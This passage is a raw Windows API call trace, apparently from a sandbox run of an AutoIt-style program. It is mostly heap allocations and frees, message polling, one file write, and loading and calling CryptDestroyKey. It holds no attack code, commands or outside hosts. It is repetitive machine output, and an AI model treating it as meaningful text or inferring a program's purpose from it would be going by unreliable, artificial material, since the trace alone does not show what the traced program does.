returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0242.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0242.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0242.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.906] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0242.936] WriteFile (in: hFile=0x2a0, lpBuffer=0x2edf8b0*, nNumberOfBytesToWrite=0x13448, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2edf8b0*, lpNumberOfBytesWritten=0x8cf5e4*=0x13448, lpOverlapped=0x0) returned 1 [0242.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0242.980] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0242.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0242.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0242.981] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0242.981] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.981] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.981] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0242.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0242.982] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0242.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0242.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0242.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0242.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0242.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e512b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0242.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0242.982] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0242.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0242.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0242.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0242.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0242.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0242.982] CryptDestroyKey (hKey=0xa86f90) returned 1 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978528 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0242.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0242.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0242.984] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.985] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0242.985] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0242.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0242.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0242.985] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0242.985] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0242.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0242.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0242.985] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0242.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0242.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0242.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0242.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0242.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0242.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0242.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0242.987] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.987] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0242.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0242.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0242.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0242.987] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0242.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0242.987] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0242.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0242.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0242.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0242.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0242.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0242.988] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0242.988] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.988] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0242.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0242.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0242.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0242.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0242.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0242.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0242.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0242.989] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0242.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0242.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0242.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0242.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.989] 